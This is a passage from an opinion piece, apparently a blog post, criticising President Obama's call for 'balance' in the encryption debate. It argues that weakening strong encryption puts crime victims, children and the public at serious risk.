Furthermore, it's not necessarily the "Orwellian/big brother" issue that people are afraid of. That's a red herring from the "privacy v. security" mindset. People are afraid of this making everyone a lot less safe. No doubt, the President is right that if there's "something really bad" happening then the politics moves in one way -- but it's pretty ridiculous for him to be saying that, seeing as the latest skirmish in this battle is being fought by his very own Justice Department, he's the one who jumped on the San Bernardino attacks as an excuse to push this line of argument.
If the President is truly worried about stupid knee-jerk reactions following "something bad" happening, rather than trying to talk about "balance" and "compromise," he could and should be doing more to fairly educate the American public, and to make public statements about this issue and how important strong encryption is. Enough of this bogus "strong encryption is important, but... the children" crap. The children need strong encryption. The victims of crimes need encryption. The victims of terrorists need encryption. Undermining all that because just a tiny bit of information is inaccessible to law enforcement is crazy. It's giving up the entire ballgame to those with malicious intent, just so that we can have a bit more information in a few narrow cases.
President Obama keeps mentioning trade-offs, but it appears that he refuses to actually understand the trade-offs at issue here. Giving up on strong encryption is not about finding a happy middle compromise. Giving up on strong encryption is putting everyone at serious risk.